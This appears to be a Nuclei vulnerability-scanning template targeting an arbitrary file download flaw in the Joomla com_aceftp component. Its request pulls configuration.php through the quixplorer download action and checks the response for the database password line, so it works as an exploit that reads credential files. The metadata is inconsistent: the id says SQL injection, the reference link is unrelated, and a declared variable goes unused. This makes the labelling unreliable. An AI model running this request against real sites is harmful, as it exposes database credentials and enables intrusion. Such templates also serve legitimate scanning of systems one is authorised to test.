id: joomla-sqli-aceftp
info:
  name: Joomla com aceftp 任意文件下载漏洞
  author: nucleixivanovich
  severity: high  
  reference: https://fbi.gov/
  description: Joomla! com aceftp /administrator/components/com_aceftp/quixplorer/index.php

variables:
  verify: '{{rand_text_alphanumeric(32,"")}}'

http:
  - method: GET
    path:
      - '{{BaseURL}}/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes'

    headers:
      User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
      Host: '{{Hostname}}'

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - contains(body,'public $password')